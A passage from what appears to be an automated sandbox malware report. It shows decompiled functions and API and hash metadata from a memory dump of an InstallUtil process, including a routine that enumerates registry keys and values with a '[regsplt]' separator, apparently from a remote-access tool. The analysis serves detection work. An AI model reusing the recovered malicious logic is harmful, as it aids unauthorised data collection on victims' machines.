                                                                      0x004469a7
                                                                      0x004469e5
                                                                      0x004469ec
                                                                      0x004469ef
                                                                      0x004469f4
                                                                      0x00446a43
                                                                      0x00446a46
                                                                      0x00446a49
                                                                      0x00446a55
                                                                      0x00446a5b
                                                                      0x00446a5d
                                                                      0x00446a65
                                                                      0x00446a65
                                                                      0x00000000
                                                                      0x00446a68
                                                                      0x004469f9
                                                                      0x004469f9
                                                                      0x004469fc
                                                                      0x00446a2f
                                                                      0x00446a35
                                                                      0x00000000
                                                                      0x00446a35
                                                                      0x004469fe
                                                                      0x004469fe
                                                                      0x00446a01
                                                                      0x00446a1f
                                                                      0x00446a25
                                                                      0x00000000
                                                                      0x00446a25
                                                                      0x00446a03
                                                                      0x00446a06
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446a0f
                                                                      0x00446a15
                                                                      0x00000000
                                                                      0x004469a9
                                                                      0x004469a9
                                                                      0x004469ab
                                                                      0x004469d2
                                                                      0x004469d8
                                                                      0x004469dd
                                                                      0x004469c8
                                                                      0x00446a6b
                                                                      0x00446a6e
                                                                      0x00446a6f
                                                                      0x00446a70
                                                                      0x00446a71
                                                                      0x00446a74
                                                                      0x00446a76
                                                                      0x00446adb
                                                                      0x00446ade
                                                                      0x00446adf
                                                                      0x00446aee
                                                                      0x00446aee
                                                                      0x00446a78
                                                                      0x00446a7b
                                                                      0x00446a7d
                                                                      0x00446aa3
                                                                      0x00446aa6
                                                                      0x00446aa9
                                                                      0x00446aac
                                                                      0x00446ab3
                                                                      0x00446ab8
                                                                      0x00446ac3
                                                                      0x00446ac8
                                                                      0x00446ace
                                                                      0x00446ad3
                                                                      0x00446ad3
                                                                      0x00446ad6
                                                                      0x00000000
                                                                      0x00446ad6
                                                                      0x00446aba
                                                                      0x00446abd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446abf
                                                                      0x00446a81
                                                                      0x00446a82
                                                                      0x00446a84
                                                                      0x00446a9b
                                                                      0x00446a86
                                                                      0x00446a8b

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: E*E
                                                                      • API String ID: 0-3771592462
                                                                      • Opcode ID: 23073f2e270f125f4087ef338e56007bd92043c6da3b3d15b3956e0c3027bcc2
                                                                      • Instruction ID: cff878a50e4481dfbe4340fb05c68759466ceb03e33b783c41abd3f940a5f7f1
                                                                      • Opcode Fuzzy Hash: 23073f2e270f125f4087ef338e56007bd92043c6da3b3d15b3956e0c3027bcc2
                                                                      • Instruction Fuzzy Hash: 4551B2B1E006199BEB11DFA9C845FAF7BB4AF4B314F16405BE400B7391D6B89901CB6B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E00410FC9(void* __ecx, short* __edx) {
                                                                      				int _v8;
                                                                      				int _v12;
                                                                      				int _v16;
                                                                      				int _v20;
                                                                      				int _v24;
                                                                      				int _v28;
                                                                      				int _v32;
                                                                      				char _v56;
                                                                      				int _v60;
                                                                      				int _v64;
                                                                      				int _v68;
                                                                      				int _v72;
                                                                      				int _v76;
                                                                      				struct _FILETIME _v84;
                                                                      				void* _v95;
                                                                      				char _v96;
                                                                      				char _v108;
                                                                      				char _v132;
                                                                      				char _v156;
                                                                      				short _v668;
                                                                      				short _v1188;
                                                                      				char _v11188;
                                                                      				short _v43956;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				int _t72;
                                                                      				long _t73;
                                                                      				void* _t93;
                                                                      				long _t103;
                                                                      				void* _t104;
                                                                      				void* _t110;
                                                                      				void* _t140;
                                                                      				int _t144;
                                                                      				int _t146;
                                                                      				void* _t147;
                                                                      				void* _t148;
                                                                      				void* _t149;
                                                                      
                                                                      				_t137 = __edx;
                                                                      				_t112 = __ecx;
                                                                      				E00453420();
                                                                      				_push(_t140);
                                                                      				_t144 = 0;
                                                                      				_t110 = __ecx;
                                                                      				E004337A0(_t140,  &_v1188, 0, 0x208);
                                                                      				_t149 = _t148 + 0xc;
                                                                      				_v24 = 0x104;
                                                                      				_v8 = 0;
                                                                      				_v12 = 0x3fff;
                                                                      				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
                                                                      				_t72 = _v8;
                                                                      				if(_t72 != 0 && _t72 != 0) {
                                                                      					do {
                                                                      						_v28 = 0xff;
                                                                      						_t103 = RegEnumKeyExW(_t110, _t144,  &_v668,  &_v28, 0, 0, 0,  &_v84);
                                                                      						_t152 = _t103;
                                                                      						if(_t103 == 0) {
                                                                      							_t104 = E0040413E(_t110,  &_v56, _t137, _t147, "\n");
                                                                      							_t137 =  &_v668;
                                                                      							E0040321D(E004042BC(_t110,  &_v108,  &_v668, _t147, _t152, _t104));
                                                                      							E00401EC9();
                                                                      							_t112 =  &_v56;
                                                                      							E00401EC9();
                                                                      						}
                                                                      						_t144 = _t144 + 1;
                                                                      					} while (_t144 < _v8);
                                                                      				}
                                                                      				_t73 = _v20;
                                                                      				if(_t73 != 0) {
                                                                      					_t146 = 0;
                                                                      					if(_t73 != 0) {
                                                                      						do {
                                                                      							_v96 = 0;
                                                                      							_v16 = 0x2710;
                                                                      							asm("stosd");
                                                                      							_v12 = 0x3fff;
                                                                      							asm("stosd");
                                                                      							asm("stosw");
                                                                      							asm("stosb");
                                                                      							_v43956 = 0;
                                                                      							_t73 = RegEnumValueW(_t110, _t146,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
                                                                      							_t156 = _t73;
                                                                      							if(_t73 == 0) {
                                                                      								E0043DDD1(_t112, _v32,  &_v96, 0xa);
                                                                      								_t149 = _t149 + 0xc;
                                                                      								E0040321D(E004042BC(_t110,  &_v56,  &_v43956, _t147, _t156, E0040413E(_t110,  &_v132, _t137, _t147, "\n")));
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								L00403336(E004052D4(_t110,  &_v132,  &_v96, _t147, _t156, E00402053(_t110,  &_v56,  &_v43956, _t147, "\n")));
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								_t93 = E00402053(_t110,  &_v156,  &_v96, _t147, "[regsplt]");
                                                                      								_t137 = E00402077(_t110,  &_v56,  &_v96, _t147, _t156,  &_v11188, _v16);
                                                                      								L00403336(E00402E61( &_v132, _t95, _t93));
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								_t112 =  &_v156;
                                                                      								_t73 = E00401F98();
                                                                      							}
                                                                      							_t146 = _t146 + 1;
                                                                      						} while (_t146 < _v20);
                                                                      					}
                                                                      				}
                                                                      				return _t73;
                                                                      			}

                                                                      APIs
                                                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00411030
                                                                      • RegEnumKeyExW.ADVAPI32 ref: 0041105F
                                                                      • RegEnumValueW.ADVAPI32 ref: 004110FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Enum$InfoQueryValue
                                                                      • String ID: [regsplt]
                                                                      • API String ID: 3554306468-4262303796
                                                                      • Opcode ID: 8d2878a3cde955a3f18606e29b15c21517c555cac481718381af8d94cd52d2b3
                                                                      • Instruction ID: 8daebb2545cb4d6cb090c7e584b7b8e8eeafcaf71e27a4cdc3956974376e0622
                                                                      • Opcode Fuzzy Hash: 8d2878a3cde955a3f18606e29b15c21517c555cac481718381af8d94cd52d2b3
                                                                      • Instruction Fuzzy Hash: EA512E71900219AADB10EBD5DC85EEFB7BDAF04308F10406BF605B6191EF786B49CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0044A3D9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                      				intOrPtr _v0;
                                                                      				char _v6;
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v36;
                                                                      				intOrPtr* _v64;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr* _v100;
                                                                      				CHAR* _v104;
                                                                      				signed int _v116;
                                                                      				char _v290;
                                                                      				signed int _v291;
                                                                      				struct _WIN32_FIND_DATAA _v336;
                                                                      				union _FINDEX_INFO_LEVELS _v340;
                                                                      				signed int _v344;
                                                                      				signed int _v348;
                                                                      				intOrPtr _v440;
                                                                      				intOrPtr* _t80;
                                                                      				signed int _t82;
                                                                      				signed int _t87;
                                                                      				signed int _t91;
                                                                      				signed int _t93;
                                                                      				signed int _t95;
                                                                      				signed int _t96;
                                                                      				signed int _t100;
                                                                      				signed int _t103;
                                                                      				signed int _t108;
                                                                      				signed int _t111;
                                                                      				intOrPtr _t113;
                                                                      				signed char _t115;
                                                                      				union _FINDEX_INFO_LEVELS _t123;
                                                                      				signed int _t128;
                                                                      				signed int _t131;
                                                                      				void* _t137;
                                                                      				void* _t139;
                                                                      				signed int _t140;
                                                                      				signed int _t143;
                                                                      				signed int _t145;
                                                                      				signed int _t147;
                                                                      				signed int* _t148;
                                                                      				signed int _t151;
                                                                      				void* _t154;
                                                                      				CHAR* _t155;
                                                                      				char _t158;
                                                                      				char _t160;
                                                                      				intOrPtr* _t163;
                                                                      				void* _t164;
                                                                      				intOrPtr* _t165;
                                                                      				signed int _t167;
                                                                      				void* _t169;
                                                                      				intOrPtr* _t170;
                                                                      				signed int _t174;
                                                                      				signed int _t178;
                                                                      				signed int _t179;
                                                                      				intOrPtr* _t184;
                                                                      				void* _t193;
                                                                      				intOrPtr _t194;
                                                                      				signed int _t196;
                                                                      				signed int _t197;
                                                                      				signed int _t199;
                                                                      				signed int _t200;
                                                                      				signed int _t202;
                                                                      				union _FINDEX_INFO_LEVELS _t203;
                                                                      				signed int _t208;
                                                                      				signed int _t210;
                                                                      				signed int _t211;
                                                                      				void* _t213;
                                                                      				intOrPtr _t214;
                                                                      				void* _t215;
                                                                      				signed int _t219;
                                                                      				void* _t221;
                                                                      				signed int _t222;
                                                                      				void* _t223;
                                                                      				void* _t224;
                                                                      				void* _t225;
                                                                      				signed int _t226;
                                                                      				void* _t227;
                                                                      				void* _t228;
                                                                      
                                                                      				_t80 = _a8;
                                                                      				_t224 = _t223 - 0x20;
                                                                      				if(_t80 != 0) {
                                                                      					_t208 = _a4;
                                                                      					_t160 = 0;
                                                                      					 *_t80 = 0;
                                                                      					_t199 = 0;
                                                                      					_t151 = 0;
                                                                      					_v36 = 0;
                                                                      					_v336.cAlternateFileName = 0;
                                                                      					_v28 = 0;
                                                                      					__eflags =  *_t208;
                                                                      					if( *_t208 == 0) {
                                                                      						L9:
                                                                      						_v12 = _v12 & 0x00000000;
                                                                      						_t82 = _t151 - _t199;
                                                                      						_v8 = _t160;
                                                                      						_t191 = (_t82 >> 2) + 1;
                                                                      						__eflags = _t151 - _t199;
                                                                      						_v16 = (_t82 >> 2) + 1;
                                                                      						asm("sbb esi, esi");
                                                                      						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                                      						__eflags = _t210;
                                                                      						if(_t210 != 0) {
                                                                      							_t197 = _t199;
                                                                      							_t158 = _t160;
                                                                      							do {
                                                                      								_t184 =  *_t197;
                                                                      								_t17 = _t184 + 1; // 0x1
                                                                      								_v8 = _t17;
                                                                      								do {
                                                                      									_t143 =  *_t184;
                                                                      									_t184 = _t184 + 1;
                                                                      									__eflags = _t143;
                                                                      								} while (_t143 != 0);
                                                                      								_t158 = _t158 + 1 + _t184 - _v8;
                                                                      								_t197 = _t197 + 4;
                                                                      								_t145 = _v12 + 1;
                                                                      								_v12 = _t145;
                                                                      								__eflags = _t145 - _t210;
                                                                      							} while (_t145 != _t210);
                                                                      							_t191 = _v16;
                                                                      							_v8 = _t158;
                                                                      							_t151 = _v336.cAlternateFileName;
                                                                      						}
                                                                      						_t211 = E0043F7AD(_t191, _v8, 1);
                                                                      						_t225 = _t224 + 0xc;
                                                                      						__eflags = _t211;
                                                                      						if(_t211 != 0) {
                                                                      							_t87 = _t211 + _v16 * 4;
                                                                      							_v20 = _t87;
                                                                      							_t192 = _t87;
                                                                      							_v16 = _t87;
                                                                      							__eflags = _t199 - _t151;
                                                                      							if(_t199 == _t151) {
                                                                      								L23:
                                                                      								_t200 = 0;
                                                                      								__eflags = 0;
                                                                      								 *_a8 = _t211;
                                                                      								goto L24;
                                                                      							} else {
                                                                      								_t93 = _t211 - _t199;
                                                                      								__eflags = _t93;
                                                                      								_v24 = _t93;
                                                                      								do {
                                                                      									_t163 =  *_t199;
                                                                      									_v12 = _t163 + 1;
                                                                      									do {
                                                                      										_t95 =  *_t163;
                                                                      										_t163 = _t163 + 1;
                                                                      										__eflags = _t95;
                                                                      									} while (_t95 != 0);
                                                                      									_t164 = _t163 - _v12;
                                                                      									_t35 = _t164 + 1; // 0x1
                                                                      									_t96 = _t35;
                                                                      									_push(_t96);
                                                                      									_v12 = _t96;
                                                                      									_t100 = E0043AD93(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                                      									_t225 = _t225 + 0x10;
                                                                      									__eflags = _t100;
                                                                      									if(_t100 != 0) {
                                                                      										_push(0);
                                                                      										_push(0);
                                                                      										_push(0);
                                                                      										_push(0);
                                                                      										_push(0);
                                                                      										E00438659();
                                                                      										asm("int3");
                                                                      										_t221 = _t225;
                                                                      										_push(_t164);
                                                                      										_t165 = _v64;
                                                                      										_t47 = _t165 + 1; // 0x1
                                                                      										_t193 = _t47;
                                                                      										do {
                                                                      											_t103 =  *_t165;
                                                                      											_t165 = _t165 + 1;
                                                                      											__eflags = _t103;
                                                                      										} while (_t103 != 0);
                                                                      										_push(_t199);
                                                                      										_t202 = _a8;
                                                                      										_t167 = _t165 - _t193 + 1;
                                                                      										_v12 = _t167;
                                                                      										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                                                                      										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                                                                      											_push(_t151);
                                                                      											_t50 = _t202 + 1; // 0x1
                                                                      											_t154 = _t50 + _t167;
                                                                      											_t213 = E00441BB3(_t167, _t154, 1);
                                                                      											_t169 = _t211;
                                                                      											__eflags = _t202;
                                                                      											if(_t202 == 0) {
                                                                      												L34:
                                                                      												_push(_v12);
                                                                      												_t154 = _t154 - _t202;
                                                                      												_t108 = E0043AD93(_t169, _t213 + _t202, _t154, _v0);
                                                                      												_t226 = _t225 + 0x10;
                                                                      												__eflags = _t108;
                                                                      												if(__eflags != 0) {
                                                                      													goto L37;
                                                                      												} else {
                                                                      													_t137 = E0044A7A8(_a12, __eflags, _t213);
                                                                      													E004427C2(0);
                                                                      													_t139 = _t137;
                                                                      													goto L36;
                                                                      												}
                                                                      											} else {
                                                                      												_push(_t202);
                                                                      												_t140 = E0043AD93(_t169, _t213, _t154, _a4);
                                                                      												_t226 = _t225 + 0x10;
                                                                      												__eflags = _t140;
                                                                      												if(_t140 != 0) {
                                                                      													L37:
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													E00438659();
                                                                      													asm("int3");
                                                                      													_push(_t221);
                                                                      													_t222 = _t226;
                                                                      													_t227 = _t226 - 0x150;
                                                                      													_t111 =  *0x46c00c; // 0xe1ce05e9
                                                                      													_v116 = _t111 ^ _t222;
                                                                      													_t170 = _v100;
                                                                      													_push(_t154);
                                                                      													_t155 = _v104;
                                                                      													_push(_t213);
                                                                      													_t214 = _v96;
                                                                      													_push(_t202);
                                                                      													_v440 = _t214;
                                                                      													while(1) {
                                                                      														__eflags = _t170 - _t155;
                                                                      														if(_t170 == _t155) {
                                                                      															break;
                                                                      														}
                                                                      														_t113 =  *_t170;
                                                                      														__eflags = _t113 - 0x2f;
                                                                      														if(_t113 != 0x2f) {
                                                                      															__eflags = _t113 - 0x5c;
                                                                      															if(_t113 != 0x5c) {
                                                                      																__eflags = _t113 - 0x3a;
                                                                      																if(_t113 != 0x3a) {
                                                                      																	_t170 = E00451FF0(_t155, _t170);
                                                                      																	continue;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      														break;
                                                                      													}
                                                                      													_t194 =  *_t170;
                                                                      													__eflags = _t194 - 0x3a;
                                                                      													if(_t194 != 0x3a) {
                                                                      														L47:
                                                                      														_t203 = 0;
                                                                      														__eflags = _t194 - 0x2f;
                                                                      														if(_t194 == 0x2f) {
                                                                      															L51:
                                                                      															_t115 = 1;
                                                                      															__eflags = 1;
                                                                      														} else {
                                                                      															__eflags = _t194 - 0x5c;
                                                                      															if(_t194 == 0x5c) {
                                                                      																goto L51;
                                                                      															} else {
                                                                      																__eflags = _t194 - 0x3a;
                                                                      																if(_t194 == 0x3a) {
                                                                      																	goto L51;
                                                                      																} else {
                                                                      																	_t115 = 0;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      														asm("sbb eax, eax");
                                                                      														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                                                                      														E004337A0(_t203,  &_v336, _t203, 0x140);
                                                                      														_t228 = _t227 + 0xc;
                                                                      														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                                                                      														_t123 = _v340;
                                                                      														__eflags = _t215 - 0xffffffff;
                                                                      														if(_t215 != 0xffffffff) {
                                                                      															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                                      															__eflags = _t174;
                                                                      															_v348 = _t174 >> 2;
                                                                      															do {
                                                                      																__eflags = _v336.cFileName - 0x2e;
                                                                      																if(_v336.cFileName != 0x2e) {
                                                                      																	L64:
                                                                      																	_push(_t123);
                                                                      																	_push(_v344);
                                                                      																	_t123 =  &(_v336.cFileName);
                                                                      																	_push(_t155);
                                                                      																	_push(_t123);
                                                                      																	L28();
                                                                      																	_t228 = _t228 + 0x10;
                                                                      																	__eflags = _t123;
                                                                      																	if(_t123 != 0) {
                                                                      																		goto L54;
                                                                      																	} else {
                                                                      																		goto L65;
                                                                      																	}
                                                                      																} else {
                                                                      																	_t178 = _v291;
                                                                      																	__eflags = _t178;
                                                                      																	if(_t178 == 0) {
                                                                      																		goto L65;
                                                                      																	} else {
                                                                      																		__eflags = _t178 - 0x2e;
                                                                      																		if(_t178 != 0x2e) {
                                                                      																			goto L64;
                                                                      																		} else {
                                                                      																			__eflags = _v290;
                                                                      																			if(_v290 == 0) {
                                                                      																				goto L65;
                                                                      																			} else {
                                                                      																				goto L64;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      																goto L58;
                                                                      																L65:
                                                                      																_t128 = FindNextFileA(_t215,  &_v336);
                                                                      																__eflags = _t128;
                                                                      																_t123 = _v340;
                                                                      															} while (_t128 != 0);
                                                                      															_t195 =  *_t123;
                                                                      															_t179 = _v348;
                                                                      															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                                      															__eflags = _t179 - _t131;
                                                                      															if(_t179 != _t131) {
                                                                      																E0043A360(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0044A3C1);
                                                                      															}
                                                                      														} else {
                                                                      															_push(_t123);
                                                                      															_push(_t203);
                                                                      															_push(_t203);
                                                                      															_push(_t155);
                                                                      															L28();
                                                                      															L54:
                                                                      															_t203 = _t123;
                                                                      														}
                                                                      														__eflags = _t215 - 0xffffffff;
                                                                      														if(_t215 != 0xffffffff) {
                                                                      															FindClose(_t215);
                                                                      														}
                                                                      													} else {
                                                                      														__eflags = _t170 -  &(_t155[1]);
                                                                      														if(_t170 ==  &(_t155[1])) {
                                                                      															goto L47;
                                                                      														} else {
                                                                      															_push(_t214);
                                                                      															_push(0);
                                                                      															_push(0);
                                                                      															_push(_t155);
                                                                      															L28();
                                                                      														}
                                                                      													}
                                                                      													L58:
                                                                      													__eflags = _v16 ^ _t222;
                                                                      													return E004318FB(_v16 ^ _t222);
                                                                      												} else {
                                                                      													goto L34;
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											_t139 = 0xc;
                                                                      											L36:
                                                                      											return _t139;
                                                                      										}
                                                                      									} else {
                                                                      										goto L22;
                                                                      									}
                                                                      									goto L68;
                                                                      									L22:
                                                                      									_t196 = _v16;
                                                                      									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                                                                      									_t199 = _t199 + 4;
                                                                      									_t192 = _t196 + _v12;
                                                                      									_v16 = _t196 + _v12;
                                                                      									__eflags = _t199 - _t151;
                                                                      								} while (_t199 != _t151);
                                                                      								goto L23;
                                                                      							}
                                                                      						} else {
                                                                      							_t200 = _t199 | 0xffffffff;
                                                                      							L24:
                                                                      							E004427C2(0);
                                                                      							goto L25;
                                                                      						}
                                                                      					} else {
                                                                      						while(1) {
                                                                      							_v8 = 0x3f2a;
                                                                      							_v6 = _t160;
                                                                      							_t147 = E00451FB0( *_t208,  &_v8);
                                                                      							__eflags = _t147;
                                                                      							if(_t147 != 0) {
                                                                      								_push( &_v36);
                                                                      								_push(_t147);
                                                                      								_push( *_t208);
                                                                      								L38();
                                                                      								_t224 = _t224 + 0xc;
                                                                      							} else {
                                                                      								_t147 =  &_v36;
                                                                      								_push(_t147);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_push( *_t208);
                                                                      								L28();
                                                                      								_t224 = _t224 + 0x10;
                                                                      							}
                                                                      							_t200 = _t147;
                                                                      							__eflags = _t200;
                                                                      							if(_t200 != 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t208 = _t208 + 4;
                                                                      							_t160 = 0;
                                                                      							__eflags =  *_t208;
                                                                      							if( *_t208 != 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								_t151 = _v336.cAlternateFileName;
                                                                      								_t199 = _v36;
                                                                      								goto L9;
                                                                      							}
                                                                      							goto L68;
                                                                      						}
                                                                      						L25:
                                                                      						E0044A783( &_v36);
                                                                      						_t91 = _t200;
                                                                      						goto L26;
                                                                      					}
                                                                      				} else {
                                                                      					_t148 = E00439941();
                                                                      					_t219 = 0x16;
                                                                      					 *_t148 = _t219;
                                                                      					E0043862C();
                                                                      					_t91 = _t219;
                                                                      					L26:
                                                                      					return _t91;
                                                                      				}
                                                                      				L68:
                                                                       			}

                                                                       Instruction address column for the listing above (decompiler side column, 0x0044a3de to 0x0044a77b; the per-line alignment with the C code was lost in extraction, and entries without an address, shown as 0x00000000, are omitted).

                                                                      APIs
                                                                      • _strpbrk.LIBCMT ref: 0044A428
                                                                      • _free.LIBCMT ref: 0044A545
                                                                        • Part of subcall function 00438659: IsProcessorFeaturePresent.KERNEL32(00000017,0043862B,00000000,0000000A,0000000A,00000000,004182F5,00000022,?,?,00438638,00000000,00000000,00000000,00000000,00000000), ref: 0043865B
                                                                        • Part of subcall function 00438659: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043867D
                                                                        • Part of subcall function 00438659: TerminateProcess.KERNEL32(00000000), ref: 00438684
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                      • String ID: *?$.
                                                                      • API String ID: 2812119850-3972193922
                                                                      • Opcode ID: b1b4c200ef205d8dd3aac9175cc5313b6beca5196626aff0c8f3ad3f0c54b954
                                                                      • Instruction ID: 2566ebba4cd7e072980776b98ba6f3f7a26a6baae37ed828252e9e03c6ce439e
                                                                      • Opcode Fuzzy Hash: b1b4c200ef205d8dd3aac9175cc5313b6beca5196626aff0c8f3ad3f0c54b954
                                                                      • Instruction Fuzzy Hash: FB51E171E40209EFEF10CFA9C881AAEFBB5EF58314F24416EE844E7340E6799E118B55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E0043E445(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				char _v28;
                                                                      				signed int _v32;
                                                                      				signed int _t69;
                                                                      				char _t70;
                                                                      				intOrPtr* _t71;
                                                                      				intOrPtr _t74;
                                                                      				void* _t75;
                                                                      				void* _t76;
                                                                      				signed int _t78;
                                                                      				void* _t79;
                                                                      				signed int _t81;
                                                                      				signed char _t87;
                                                                      				signed char _t90;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t96;
                                                                      				signed int _t101;
                                                                      				intOrPtr _t102;
                                                                      				signed int _t105;
                                                                      				char* _t111;
                                                                      				signed int _t113;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t122;
                                                                      
                                                                      				_t69 = E00445D3D(_a4);
                                                                      				_v16 = _t69;
                                                                      				_v12 = 2;
                                                                      				_t113 = _t69 >> 6;
                                                                      				_t101 = (_t69 & 0x0000003f) * 0x30;
                                                                      				_v32 = _t113;
                                                                      				_v8 = 0;
                                                                      				_t70 =  *((intOrPtr*)(0x46d800 + _t113 * 4));
                                                                      				_v28 = _t70;
                                                                      				_v20 = _t101;
                                                                      				if( *((char*)(_t70 + _t101 + 0x29)) != 1) {
                                                                      					_v12 = 1;
                                                                      				}
                                                                      				_t71 = _a4;
                                                                      				_t102 =  *((intOrPtr*)(_t71 + 8));
                                                                      				_v24 = _t102;
                                                                      				if(_t102 != 0) {
                                                                      					_t105 = _v20;
                                                                      					asm("cdq");
                                                                      					_t96 = _t113;
                                                                      					asm("cdq");
                                                                      					_t122 =  *_t71 -  *((intOrPtr*)(_t71 + 4)) + _v24;
                                                                      					_t21 =  &_v28; // 0x43e420
                                                                      					_t74 =  *_t21;
                                                                      					asm("adc ebx, edx");
                                                                      					__eflags =  *(_t74 + _t105 + 0x28) & 0x00000080;
                                                                      					if(( *(_t74 + _t105 + 0x28) & 0x00000080) == 0) {
                                                                      						L25:
                                                                      						_t75 = E004532B0(_t122, _t96, _v12, _v8);
                                                                      						_t66 =  &_a20; // 0x43e420
                                                                      						_t76 = E004532B0(_a16,  *_t66, _v12, _v8);
                                                                      						asm("sbb edx, edi");
                                                                      						_t78 = _t76 - _t75 + _a8;
                                                                      						asm("adc edx, [ebp+0x10]");
                                                                      						L26:
                                                                      						return _t78;
                                                                      					}
                                                                      					_t79 = E00447349(_v16, 0, 0, 2);
                                                                      					__eflags = _t79 - _a8;
                                                                      					if(_t79 != _a8) {
                                                                      						L13:
                                                                      						_t81 = E00447349(_v16, _a8, _a12, 0) & _t113;
                                                                      						_t113 = _t113 | 0xffffffff;
                                                                      						__eflags = _t81 - _t113;
                                                                      						if(_t81 != _t113) {
                                                                      							__eflags = _t96;
                                                                      							if(__eflags > 0) {
                                                                      								L21:
                                                                      								asm("cdq");
                                                                      								_t122 =  *((intOrPtr*)(_a4 + 0x18));
                                                                      								_t96 = _t113;
                                                                      								L22:
                                                                      								__eflags =  *( *((intOrPtr*)(0x46d800 + _v32 * 4)) + _v20 + 0x28) & 0x00000004;
                                                                      								L23:
                                                                      								if(__eflags != 0) {
                                                                      									_t122 = _t122 + 1;
                                                                      									asm("adc ebx, edi");
                                                                      								}
                                                                      								goto L25;
                                                                      							}
                                                                      							if(__eflags < 0) {
                                                                      								L18:
                                                                      								_t87 =  *(_a4 + 0xc) >> 6;
                                                                      								__eflags = _t87 & 0x00000001;
                                                                      								if((_t87 & 0x00000001) == 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								_t90 =  *(_a4 + 0xc) >> 8;
                                                                      								__eflags = _t90 & 0x00000001;
                                                                      								if((_t90 & 0x00000001) != 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								_t122 = 0x200;
                                                                      								_t96 = 0;
                                                                      								goto L22;
                                                                      							}
                                                                      							__eflags = _t122 - 0x200;
                                                                      							if(_t122 > 0x200) {
                                                                      								goto L21;
                                                                      							}
                                                                      							goto L18;
                                                                      						}
                                                                      						_t78 = _t113;
                                                                      						goto L26;
                                                                      					}
                                                                      					__eflags = _t113 - _a12;
                                                                      					if(_t113 != _a12) {
                                                                      						goto L13;
                                                                      					}
                                                                      					_t91 = _a4;
                                                                      					_v16 = 0;
                                                                      					_t115 =  *((intOrPtr*)(_t91 + 4)) + _t122;
                                                                      					__eflags = _t115 -  *((intOrPtr*)(_t91 + 4));
                                                                      					asm("sbb edx, edx");
                                                                      					_t113 =  !_t115 & _t115 -  *((intOrPtr*)(_t91 + 4));
                                                                      					__eflags = _t113;
                                                                      					if(_t113 == 0) {
                                                                      						L12:
                                                                      						__eflags =  *(_t91 + 0xc) >> 0x00000005 & 0x00000001;
                                                                      						goto L23;
                                                                      					}
                                                                      					_t111 =  *((intOrPtr*)(_t91 + 4));
                                                                      					do {
                                                                      						__eflags =  *_t111 - 0xa;
                                                                      						if( *_t111 == 0xa) {
                                                                      							_t122 = _t122 + 1;
